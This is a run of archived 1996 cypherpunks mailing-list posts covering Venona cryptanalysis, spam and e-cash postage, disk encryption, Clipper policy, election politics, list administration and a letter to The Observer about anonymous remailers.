W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 27 Aug 1996 07:37:57 +0800
To: cypherpunks@toad.com
Subject: Re: Public vs Private (Was: Re: Violation or Protection?)
Message-ID: <ae47274102021004e948@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



This is a very thoughtful essay. We need more of them.

Though "I agree" messages are frowned upon, the fact is that most
Cypherpunks messages understandably are messages critiquing or disagreeing
with some part of another message...this is not too surprising.

But sometimes it's useful to say "I agree."

At 1:31 PM 8/26/96, Lou Poppler wrote:
...
>As with anything, there are gray areas and boundary cases in real life
>where this is not as clear-cut as in the private/public examples TCM
>has provided us in the past.  Let's look at a couple of fuzzy examples.
...
>Another fuzzy gray area would be the common areas in shopping malls --
>the large corridors outside the stores, with fountains and park benches
>and payphones and trees and public performance areas.  These spaces
...
>for trendy young people to want to gather.  Various skirmishes are
>occasionally fought over such questions as soliciting petition signatures
>or giving out free printed information in these spaces.

This is essentially a "squatter's rights" kind of "blurring," as I see it.
(And I don't agree with the argument for the blurring.) The argument goes
something like this: "I've been coming to this Mall for many years, and
this is where the people I want to see my protest come. Therefore, I have
earned a kind of squatter's right to enter your property and make my
protest."

The larger game-theoretic point is the one Lou notes later, that the
players on all sides use the law to jockey for advantage--the merchant gets
skateboarding and loitering banned on public streets, customers of private
shopping malls get the courts to let them set up their protests on the
property of others.

(Needless to say, I don't sympathize with either example.)


...
>This is true in perhaps more ways than those so far discussed.
>The cause of liberty is broad: it embraces Mr. May's freedom to run his
>hypothetical business by his own rules, dictating what his employees may
>and may not do using his computers and firing them if he doesn't like
>the color of their tie; it also embraces the freedom of surly youths
>and old codgers to hang out somewhere, up to no particular good and
>espousing unpopular or pig-headedly-wrong opinions, frightening horses
>and small children.

And just as one lobbying group is pushing for restrictions in public places
of "loiterers" and "bums" (my town, Santa Cruz, passed a law which
criminalized _sitting_ on public streets, even out of the flow of traffic),
other lobbying groups are pushing for interfering with rights of employers
to set dress codes, as but one example.

A constant confusion of what "rights" really are.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 27 Aug 1996 07:09:23 +0800
To: cypherpunks@toad.com
Subject: Re: NSA's Venona Intercepts
In-Reply-To: <v01540b06ae4781a60981@[172.17.1.61]>
Message-ID: <199608261720.KAA02103@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



smith@sctc.com (Rick Smith) writes:
>One question that I haven't found answered in my perusals of the site is a
>definitive statement of the cryptographic technology used by the Soviets. I
>was re-reading Kahn's 1967 chapter on Soviet crypto and he claimed that
>they relied primarily on one time pads. In fact, he was pretty specific
>about them using OTPs for exactly the type of traffic appearing in the
>Venona archive. But when I look at the partial decrypts in the Venona
>archive I don't understand how you'd get such partial decrypts from OTPs.

>The intercepts seem to indicate the use of ciphers with some codewords
>weakly layerd on top. Some intercepts show translations based on the
>phonetic properties of the extracted Russian plaintext. So I don't think
>the "unrecovered codegroups" are caused by a classic code that substitutes
>tokens for word meanings. But you're not going to crack only part of a OTP
>ciphertext -- presumably you'd need a compromised key tape, and that would
>either decrypt everything or nothing.

>So they were either really using rotor machines or they were using
>something else. Any other ideas? Other references?

I too am waiting eagerly for them to show more of the real details of
decryption; but from what we know so far, the partial decrypts seem quite
compatible with what NSA says they broke: an underlying code system
superencrypted with a OTP which occasionally becomes a 2TP.  For example,
suppose you have two chunks of ciphertext, and you've determined using the
kappa test that they have a partial overlap (the easy part of the
process).  You superimpose them as follows:

	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
		bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb

and then work on the parts where the a's and b's overlap.  If you know the
underlying code book (through a decade of previous hard work, or, if you're
really lucky, finding a partially-burned copy of a codebook in a castle in
Germany), you can with considerable sweat determine the code groups in
both messages in the overlapped part, recover that part of the OTP, and
then drag the recovered OTP through the rest of your traffic looking for
more matches.

If you don't have a complete code book you may not know what all of the
code words mean; for example, I've seen no evidence that ALES really does
stand for ALGER HISS.  In addition, if you have no more overlaps with the
part at the beginning of message "a" or the end of message "b" above, you
have no way to determine anything about those parts of the OTPs other than
the length of the bits you can't read.

These two sources of difficulty seem to me to explain the "unrecovered
codegroups" you noted: for the long stretches, they didn't have
overlapping messages to give an entry into the OTP; for individual code
groups, they didn't have enough context to break that part of the code.

The phonetic stuff you mentioned doesn't cause me heartburn -- a code will
include syllables or letters, so that concepts that don't have their own
code group can get assembled out of constituent parts.  Still seems
consistent to me.

	Jim Gillogly
	4 Halimath S.R. 1996, 17:08




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sclatter@netscape.com
Date: Tue, 27 Aug 1996 07:09:17 +0800
To: cypherpunks@toad.com
Subject: Apology
Message-ID: <199608261727.KAA23073@littlewing.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



During my efforts to rectify a problem with our news server, I
inadvertently remailed a number of messages to this list.  I
apologise for the disturbance this has caused, and will do my best 
to prevent a repeat of the error.

Thank you,

Sarah




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smith@sctc.com (Rick Smith)
Date: Tue, 27 Aug 1996 08:49:32 +0800
To: cypherpunks@toad.com
Subject: NSA's Venona Intercepts
Message-ID: <v01540b06ae4781a60981@[172.17.1.61]>
MIME-Version: 1.0
Content-Type: text/plain


The bulk of the material available from NSA's web site is associated with a
long time project called Venona to decrypt Soviet message traffic from the
1940s. It's an interesting exhibition of the practical output of
cryptanalysis that, incidentally, contains alleged reference to famous
Commie spies of that era (Hiss, the Rosenbergs, etc).

One question that I haven't found answered in my perusals of the site is a
definitive statement of the cryptographic technology used by the Soviets. I
was re-reading Kahn's 1967 chapter on Soviet crypto and he claimed that
they relied primarily on one time pads. In fact, he was pretty specific
about them using OTPs for exactly the type of traffic appearing in the
Venona archive. But when I look at the partial decrypts in the Venona
archive I don't understand how you'd get such partial decrypts from OTPs.

The intercepts seem to indicate the use of ciphers with some codewords
weakly layerd on top. Some intercepts show translations based on the
phonetic properties of the extracted Russian plaintext. So I don't think
the "unrecovered codegroups" are caused by a classic code that substitutes
tokens for word meanings. But you're not going to crack only part of a OTP
ciphertext -- presumably you'd need a compromised key tape, and that would
either decrypt everything or nothing.

So they were either really using rotor machines or they were using
something else. Any other ideas? Other references?

Rick.
smith@sctc.com          secure computing corporation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James C. Sewell" <jims@MPGN.COM>
Date: Tue, 27 Aug 1996 08:06:10 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
Message-ID: <3.0b11.32.19960826110912.006d4158@central.tansoft.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:47 AM 8/24/96 -0500, William H. Geiger III wrote:
>
>No I have to dissagree. Who I send mail to or whom I receive mail from is 
>no-ones business. I for one have no intention of "signing up" or 
>"regestering" with any mail server. I most certainally want to be the one to 
>decide what mail I receive or do not receive, not someone elses idea of what 
>I should receive.

Upon reflection I can say you are right, UNLESS we can put this "signup"
thing on the end-user's machine so he can set it in his own privacy and
no one else can pilfer it.

The ultimate solution is AI mail clients, but that's too far off to wait for,
I feel.

Jim Sewell - jims@tansoft.com    Tantalus Incorporated - Key West, FL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 27 Aug 1996 07:58:49 +0800
To: cypherpunks@toad.com
Subject: Denning interview in Wired
Message-ID: <199608261817.LAA03556@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


don't recall anyone mentioning this--
Steven Levy did a lengthy piece on Dorothy Denning for the
recent Wired. 

any reactions?

I was personally struck at how Dorothy seems to lack strong
convictions that hold up in the face of others. she wrote
a paper urging that hackers be studied and worked with by
the security community and then backed away from the position
quickly after talking to "authorities".


I was amazed that Dorothy, after a long time, has failed to
confront some very basic issues in her advocation of 
Clipper:

1. constitutional issues. it would be ok for me if she described
why she thinks that privacy is not constitutionally protected,
but she fails to mention constitutionality issues in virtually
any of her writings. frankly this strikes me as the utmost
weasely evasion. is she aware of any court precedent on freedom
of speech, freedom to speak in private etc? she never quotes
any case law etc.

2. she fails to address the issue of "returns vs. cost" or
"cost/benefit" ratio. her argument amounts to an extremely
simplistic line, "law authorities have been stymied by crypto. therefore
it should be restricted". but this reminds me of speed limit
advocates saying, "55 saves lives". well, how many? 35 saves lives
over 55. the key issue is that of *compromise*: what is the optimum
compromise?  we can catch more criminals by adding security cameras
everywhere, but what are the costs? 

such back-and-white thinking has 
little place in any complex policy issue, yet unfortunately tends to 
dominate them. it's very bizarre to see an academic like Denning
just seem to be vacuously oblivious to such simple concepts such
as "tradeoffs". nothing I've read suggests she has ever addressed
the issue of *compromise* in regard to catching criminals vs.
protecting rights.

but amazingly, people like Kallstrom seem to think the same way.
paraphrased, "if even one criminal gets away because we didn't have enough
funding in the FBI, we need more funding in the FBI" etc.

3. she fails to address the "big brother" issue. why is wiretapping
never going to be used by "big brother"? it's inconceivable to me
how she can honestly evade this issue as well. she has never addressed
the issue of abuse by law authorities from what I can tell.

4. Denning seems to be to be remarkably swayed by "authority figures".
she has changed her opinion before based merely on conversations 
with "authority figures" in the FBI and NSA. it seems maybe she has
a bit of "spook envy" or something like that. many of her arguments
for me essentially amount to, "people that claim to know what they
are doing say we need [x], therefore we need [x]"


well, I am not trying to start a new round of Denning-bashing 
(although that's always fun, hee, hee) but the recent article does
give a little new food for thought about Denning's psychology etc.

frankly I think that Denning has lost the intellectual battle because
she absolutely fails to address some of the above key points. (particularly
the total failure to address the constitution is getting more egregious). I 
suggest that anyone who wants to debunk her line of thinking (which apparently
is getting to be awfully easy) just focus on any of the above areas.
she apparently has no reponse to these points in anything I have
read of hers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip L. Karlton" <karlton@netscape.com>
Date: Tue, 27 Aug 1996 10:25:48 +0800
To: "David E. Smith" <dsmith@prairienet.org>
Subject: Re: Message Body Suppressed...
In-Reply-To: <199608250312.WAA05286@bluestem.prairienet.org>
Message-ID: <3221ED48.5079@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


David E. Smith wrote:

> This is getting annoying.  Could one of our
> resident Netscape employees take a look into
> this one and see what's happening?

A system admin had a brain freeze over the weekend and was
resubmitting some messages that bounced to a broken news
server on Thursday. Some of the messages were redirected
back to their originating mailing list.

I have no idea why the message bodies were "suppressed."

I can't tell when the messages were actually resent since
the news gateway software rewrites the Date: field of the
incoming messages.

In any event, I don't believe anything sinister or intentional
was done.

PK
--
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://home.netscape.com/people/karlton
Netscape Communications




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@acm.org>
Date: Tue, 27 Aug 1996 08:40:12 +0800
To: cypherpunks@toad.com
Subject: sorry about the mail bounces
Message-ID: <2.2.32.19960826155707.006f1f34@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems that my address may have caused lots of problems for
the list, mailing lists were getting lots of bounces of things
sent to me.  I haven't heard for sure, but I'm guessing this
is the reason the list was taken down yesterday.

ACM Network Services tells me they have fixed the problem now.

Sorry about that, but I had no idea the problem was happening.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drifter@c2.net (Drifter)
Date: Tue, 27 Aug 1996 14:21:21 +0800
To: cypherpunks@toad.com
Subject: File System Encryption
Message-ID: <3221922d.3171340@c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I'm aware of the three main disk encryption programs SFS, SECDRV, and
SECDEV, but I need to find a solution that works with Windows 95 32bit
or Windows NT 4.0.

I'm currently using SFS 1.17 and Secure Drive under Win-95, but am
unable to continue to work in dos compatability mode due to severe
performance hits.  I am open to commercial products that have passed
peer review, but know of none.

If anyone could suggest a solution (outside of switching OS's), I
would be *most* gratefull.

Please respond to the list, as I am a subscriber under another
account.

The Drifter





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 27 Aug 1996 12:33:12 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk voting - ITAR or CDA
Message-ID: <199608261917.MAA24551@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:37 AM 8/25/96 -0400, Vincent Cate wrote:
>So it seems Dole is the better vote.  Is this important enough to many
>cypherpunks to actually determine their vote?

Every time I think about voting for Dole, I read something in the papers
that convinces me it is a bad idea.  The most recent is that he wants to
raise the intensity of the disastrous, failed war on drugs.

You know the war.  The one that has forced suppliers to enforce their
contracts with violence because the courts won't help them.  The one that
eliminated the concept of responsible use which has worked so well with
alcohol.  The one that has eliminated reputation from the drug market,
leading to overdoses and poisonings.  The one that is responsible for most
of the wire taps authorized in the USA.  The one that has turned the USA
into the prison capitol of the world.  Don't get me started.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 27 Aug 1996 00:03:37 +0800
To: cypherpunks@toad.com
Subject: NAV_ios
Message-ID: <199608261253.MAA23264@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-26-96, NYP: 
 
   "A Netscape Bid For the Souls of New Machines." Markoff. 
 
      Netscape plans on Monday to announce that it has created 
      a software company that will enter an alliance with 
      I.B.M., Oracle and four Japanese consumer electronics 
      giants. The venture, called the Navio Corporation, 
      intends to develop refined software for browsing the 
      Internet and a new OS that Netscape hopes will become a 
      standard means for controlling Internet access and basic 
      operations for a broad range of consumer devices. 
 
      The four Japanese companies in the alliance -- Sony, 
      Nintendo, Sega and NEC -- are dominant in producing a 
      variety of home entertainment devices, and the expected 
      announcement, analysts said, suggested that the 
      Internet, which until now has largely been a business 
      and educational marketplace, would soon vastly broaden 
      its scope. 
 
   ----- 
 
   http://jya.com/navios.txt  (8 kb) 
 
   NAV_ios 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 27 Aug 1996 07:59:54 +0800
To: cypherpunks@toad.com
Subject: Re: NSA's Venona Intercepts
Message-ID: <199608262018.NAA02361@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:49 AM 8/26/96 -0600, Rick Smith wrote:
>One question that I haven't found answered in my perusals of the site is a
>definitive statement of the cryptographic technology used by the Soviets.

I haven't revisited the site to check, but I distinctly remember a
statement to the effect that the system was a one time pad system. 
However, due to a mistake somewhere in the chain, some of the one time pads
were used twice.  The resulting two time pad system gave NSA the wedge they
needed to recover what they have.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Tue, 27 Aug 1996 07:59:55 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Spamming
Message-ID: <2.2.32.19960826182604.008973e0@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 12:38 PM 8/25/96 -0500, you wrote:
>Vipul Ved Prakash wrote:
>
>What do cypherpunks think about the following practice or law (I realize
>that it may be impossible to implement): each email message should carry
>a little digicash check for, say, 20 cents. Mail reading programs should
>reject (send back unread) all messages not carrying these digital
>checks, unless the senders are in the "friends list". The MUAs should
>ask users whether they want to "cash" the digital check or not.

I'm all in favor of it.  The POP3 client I write to cash those little
digital droplets and tell the spammers that I *love* to get their ads, read
each one for 45 seconds/page, scroll thru them lovingly, and reply to the
specified address for much more information, has the potential to pay for my
master's degree.

Call it the SpamMonster(tm).  ("Spam is for money, that's good enough for me")

Therefore, in order to actually make their system work, they'd need to send
out their own special mail readers.  And I'd disassemble one and
SpamMonster(tm) would continue to eat their spam, ad infinitum (pun not
intended, but it works really, really well, n'est pa?)

I do not believe it is possible to have a secure executable that exists on
an uncontrolled user's machine.  "Tamperproof" encryption chips still
require communications in and out from the user's program.  A determined
attacker could continue to use the pieces of their code that talk to the
encryption chip.

Never underestimate the allure of "free money" when you're planning to give
it away.

>If they do cash the check, the digital bank notifies the senders, so
>that they can adjust their behavior and would not send letters to such
>individuals.
>
>The checks should expire very soon to prevent people cashing them later
>when they are desperate for money. There can also be public notice
>systems that store addresses of individuals who abuse the system (for
>example, those who post questions to newsgroups and collect the digital
>checks), so that people would not reply to such users in the future.

Hmm.  Reading ONE message from them puts me on a "Spammer's blacklist"?
Without the e-cash incentive, sign me up!

>Is there a potential for abuse in this system?

Depends on your point of view  :-)  I certainly think it has potential!

John
--
J. Deters  "Captain's log, stardate 25970-point-5.  I am nailed to the hull."
+-------------------------------------------------------+
| NET:   jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:  1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'36"N by 93^16'27"W Elev. ~=290m (work)   |
| PGP Key ID:  768 / 15FFA875                           |
+-------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 27 Aug 1996 10:07:33 +0800
To: Cypherpunks Mailing List <dccps@eff.org
Subject: Cypherpunks at InfowarCon '96
Message-ID: <Pine.SCO.3.93.960826131945.1169A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


There've been a couple of posts mentioning that there will be a Cypherpunk
presence at InfowarCon '96.  Besides the more public figures (Eric
Hughes and Phil Zimmermann, among them), I'm sure that the audience will
have a fair number of list participants in attendance.  If anyone wants to
say "howdy" or swap key fingerprints, I'll be there both days and for the
reception on the 4th.  I'm the panel moderator for "B1 -
Emergency/Disaster Planning for the Effects of Information Warfare" affair
on the 5th (stop by if you want to see FEMA and the Red Cross go at it).

If you're at the "schmooze and booze" reception on the evening of the
fourth, please come up and introduce yourself.  I'll be the guy who's
6'2", 200lbs, shoulder-length brown hair in a red bandanna headband, full
beard, jeans, boots, and my leather biker vest.  I should be fairly easy
to spot :)

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hugh Daniel <hugh@ecotone.toad.com>
Date: Tue, 27 Aug 1996 12:46:20 +0800
To: cypherpunks@toad.com
Subject: ADMIN:  Problems with the list goto the owner, not the list!
Message-ID: <199608262123.OAA26029@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  In the future please send all messages of the form ~something is
wrong with the list~ to owner-cypherpunks@toad.com and NOT the list
its self.  We already have enough off topic and puerile traffic
cluttering up the list.
  If you think you see a _very_ major problem then please do email me
directly.
  Now please get back to building the better world we sometimes still
talk about building...

		||ugh Daniel
		Majordomo Owner & Potty Trainer
		hugh@toad.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Tue, 27 Aug 1996 10:00:45 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk voting - ITAR or CDA
Message-ID: <199608261832.OAA90700@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Mon Aug 26 14:32:37 1996
I sent this earlier, but evidently toad.com ate it, so I am sending again, 
despite Bill Stewart's excellent post on the subject. BTW, Bill is one of 
the nicest guys you would ever want to meet, and all cypherpunks should try 
to meet him if they get a chance.

Apologies if you get this twice, and I would only add that in any election 
there are winners and losers, and the sets of losers on cypherpunks if 
Harry Browne wins or does does well are:

1. Lawyers. If laws are simpler and better-written in something approaching 
the English language and judges who respect the constitution are 
selected-for, lawyers and law-professors would feel the economic effects of 
less demand for their services.
2. Accountants. If the tax laws are simplified and the IRS is eliminated, 
there will be less need for accountants to figure out what people actually 
owe in taxes.
3. Offshore dataheaven providers. ;) If the above happens, running 
businesses from the US will be relatively more attractive than running them 
from Anguilla, all other things being equal.

Vincent Cate wrote:

> Dole says he would fix the ITAR problem, but try to keep something like
> CDA. 

He would say anything to get elected.

> Clinton is keeping ITAR and signed CDA.  But not having the religious
> right he might soften on CDA.

Lame ducks don't have to soften, on anything. That's what's so fun about 
being a lame duck.

> The courts seem to be throwing out CDA much faster than ITAR (some fast
> track to the supreme court built into the law).  It also seems like
>  ITAR
> is the more important thing to fix (it is easier to move pornography
>  etc
> out of the US than major software companies). 
> 
> So it seems Dole is the better vote.  Is this important enough to many
> cypherpunks to actually determine their vote?

If the Republican candidate had been Forbes, there might have been a "don't 
let the great be the enemy of the good" argument against voting for a
Libertarian. As it stands now, Dole is, at best, arguably the "lesser of 2 
evils," which still comes out evil in my book. As the designated partisan 
Libertarian on the list, I urge all cypherpunks to vote their consciences 
and pick Harry Browne and Jo Jorgensen. The mere fact that the media is 
[grudgingly] covering us suggests we are finally doing something right, and 
Harry is winning many Internet polls despite much fawning, hopeful coverage 
for the big-eared billionaire hypocrite stealth-candidate, who has no 
position on much of anything, but certainly would enjoy having the TLAs 
investigate his enemies.

I fully accept that it is likely Dole or Clinton will win, but I think it 
will fill an important cypherpunk goal if the Libertarian Party candidates 
get a vote large enough to be the margin of victory, and I will be very 
proud of my vote, no matter who wins this election. Vote your consciences 
for your own sake, and the sake of the children who, no matter what, will 
inherit the debt of the irresponsible statists in power now.
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"'Filegate' is starting to make _Ed_ _Meese_ look ethical."
 -- me
 Defeat the Duopoly! Vote "NOTA," not Slick/Dull in November.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray C
Ross Perot is now on welfare.<sigh>
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMiHtzG1lp8bpvW01AQFxxAP9GW/NizRkEqW0y4b0vGF5npoOGQj4jSVQ
wBz8toN78LUY1xKyEj2y0WWqjfl3WQOMk2dCMlRskHZU8C8+nqLS3FgHaWCwrVF+
Th7LA3hvErvoVNKsrRTKAuGUkIm8XFQLfmPi8L6z94OXY5qXXRvVS9exRwlbH/DZ
gpwGznNDjw0=
=t8M2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 27 Aug 1996 12:45:53 +0800
To: cypherpunks@toad.com
Subject: RSA/Security Dynamics filings are on the web
Message-ID: <199608262238.PAA17133@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The RSA/SDTI merger may be the only chance we ever get to see RSA's
financial info.  Previously it was a privately held company, which
didn't report its finances publicly; now it'll be reported as part of
SDI (a much bigger company), so its finances will be hidden in
their larger business.

You can also see what RSA and SDTI are saying about the
RSA/Cylink/Schlafly lawsuits, the origins of VeriSign, how
Addison Fisher bankrolled RSA and owned 55% of it, etc.

Look on the SEC's EDGAR system, which contains copies of reports that
the government requires publicly traded companies to file.  Go to
http://www.sec.gov/cgi-bin/srch-edgar?security+dynamics+technologies
and view the various forms.  The most fun is probably the big one,
the 1.5MB S-4 form from the merger itself.

These documents will require a tolerance for legalese, but there are lots
of gems in there for the patient.

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 27 Aug 1996 10:27:57 +0800
To: cypherpunks@toad.com
Subject: The Observer [UK] editorializes against online freedoms (fwd)
Message-ID: <Pine.GUL.3.95.960826160534.24037A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Information longs to be free, even if some forums aren't...

We've put scans of the full story onto www.scallywag.com.

The source is a reporter for a competing newspaper.

---------- Forwarded message ----------
Date: Mon, 26 Aug 1996 09:40:43 -0700 (PDT)
From: Rich Graves <rich@c2.org>
To: fight-censorship@vorlon.mit.edu
Subject: Re: The Observer [UK] editorializes against online freedoms

Attribution for the forward deleted on request. Richardson's included
PGP-signed letter, though, is public. I hope this reassures US activists
that *even the British* know the story is wrong.

-rich

---------- Forwarded message ----------
Date: Mon, 26 Aug 1996 12:24:05 +0100
Subject: Response to Observer

A nice technical response to some of the factual innacuracies in The
Observer piece. Not quite the way I would have done it . . . but good
nonetheless.

-----BEGIN PGP SIGNED MESSAGE-----

I. T. Consultancy Limited

Our reference  L2217

The Editor
The Observer
119 Farringdon Road
London EC1R 3ER

26 August 1996

AN OPEN LETTER - FOR PUBLICATION

Sir,

I read with some interest the article by David Connett and Jon Henley
in yesterday's edition regarding the Internet and child pornography.
I was particularly interested as I am a computer consultant advising
clients on Internet issues.

In my professional opinion, the technical standard of the reporting
was sufficiently poor as to be both inaccurate and misleading.  The
purpose of this letter is to clarify certain technical issues which
might cause your readers to reach unfounded or incorrect conclusions.

It is important to be aware of the various methods by which
information generally (which can include pornography) is distributed
around the Internet.  Your article focuses on one particular route,
namely Newsgroups.  It is Newsgroups which are detailed in the
Metropolitan Police's letter to Internet Providers and which are
concentrated upon by your article.  There are several other means of
distributing information.  I believe however that the Police letter
lists fewer than the 150 groups referred to by the authors.
Interestingly enough Newsgroups only offer the means of broadcasting
information to anyone who wants to retrieve it.

The authors do not appear to have a sufficient grasp of what a
"remailer" does.  For example they seem to draw a direct link between
the use of such remailers and people being able to "log on and
participate in 'live' and 'interactive' filmed sessions".  A lay
reader would perhaps draw the inference that the remailer is somehow
involved in any such live participation.  Unfortunately this could
not be further from the truth.  Remailers simply allow people to post
messages, either as email to other people or to Newsgroups for
general reading.  Nothing more.  Remailers are generally incapable of
being "logged on" to.

Your article also refers to "remailing companies", from which the lay
reader might infer that remailers are operated for commercial profit.

Such an inference would again be wholly incorrect.  I know of no
organisation operating a remailer for profit, indeed none of them
even charge for their services.  They are generally run by
individuals on a voluntary basis who consider them as a service to
the Internet community.  Your article appears not to mention any of
the purposes of such remailers other than in terms of the
distribution of pornography.  In my view it would be difficult to
present a balanced article without doing so.

Different remailers take different steps to prevent whatever their
operators consider as "abuse".  My understanding is that Mr.
Helsingius' service restricts messages to 48k bytes (or characters)
and prohibits postings to the "binaries" newsgroups designated for
images.  I also understand that it only allows 30 messages per user
per day.  At a technical level these restrictions would make it
almost impossible to use his service for mass distribution of any
binary data, not just pornography.

It therefore appears surprising to me that your article should allege
that Mr. Helsingius' remailer is responsible for handling "90 per
cent of all child pornography" on the Internet.  I wonder what
substantiating evidence The Observer has to this effect other than
the alleged claim by Toby Tyler.  Indeed it appears from your article
that the words "is supplied through this remailer" may not be a
direct quote from Toby Tyler.

Your article alleges that "the photographs made available to Demon's
subscribers through the Internet are supplied anonymously by
remailing companies".  The lay reader might infer from this that all
photographs therefore come via remailers.  Again this would be far
from the truth.

Finally I hope this letter offers some assistance to your readers in
clarifying a number of issues which were perhaps less than clear in
your article.  Given your newspaper's difficulties with technical
issues, I would be grateful if you would kindly refer any editing of
this letter to me prior to publication.

Yours faithfully,
Matthew Richardson

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAgUBMiFvEAKwLwcHEv69AQGjIQP+IGR9rhvdYXe7CuCcwPl/tIrIBryikTM2
IVOpygTF2nCPf3WEJ8czRvs1emp9d9d++69XiG1f6QAeP9Jv/h9KzVtV7mjjuqCX
LhlhXBYjLIiGCcxljKZ07zHFlCeZWCzuAmIFnZbz2fNNjqyicheIMlxI2tDrGgjp
dlaGZuAI2XY=
=dkXg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 27 Aug 1996 11:54:10 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Discussion: The Digital Commerce Clause [Long] [Was: Re: The Commerce Clause and the Crypto Issue]
In-Reply-To: <ae432be9000210041c17@[205.199.118.202]>
Message-ID: <Pine.SUN.3.94.960826125620.28010A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 23 Aug 1996, Timothy C. May wrote:

> It seems to me that in recent years nearly any type of sweeping legislation
